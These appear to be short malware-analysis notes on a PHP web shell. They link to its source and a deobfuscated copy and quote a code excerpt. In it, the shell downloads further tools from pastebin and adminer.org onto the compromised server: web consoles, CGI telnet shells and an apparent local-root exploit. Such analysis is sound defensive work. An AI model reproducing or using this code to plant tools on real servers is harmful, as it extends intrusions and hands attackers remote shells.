src:

https://gist.github.com/delyee/bd017c6bb9473191b7eb312f1fce3d1d

deobf:

https://gist.github.com/delyee/b564cb0b4d5230d748d6c6e0b83691eb

cnc?

other utils

if ($name === "adminer") $get = array(
        "https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php",
        "adminer.php"
    );
    elseif ($name === "webconsole") $get = array(
        "https://pastebin.com/raw/2i96fDCN",
        "webconsole.php"
    );
    elseif ($name === "cgitelnet1") $get = array(
        "https://pastebin.com/raw/Lj46KxFT",
        "idx_cgi/cgitelnet1.idx"
    );
    elseif ($name === "cgitelnet2") $get = array(
        "https://pastebin.com/raw/aKL2QWfS",
        "idx_cgi/cgitelnet2.idx"
    );
    elseif ($name === "LRE") $get = array(
        "https://pastebin.com/raw/PVPfA21i",
        "makman.php"
    );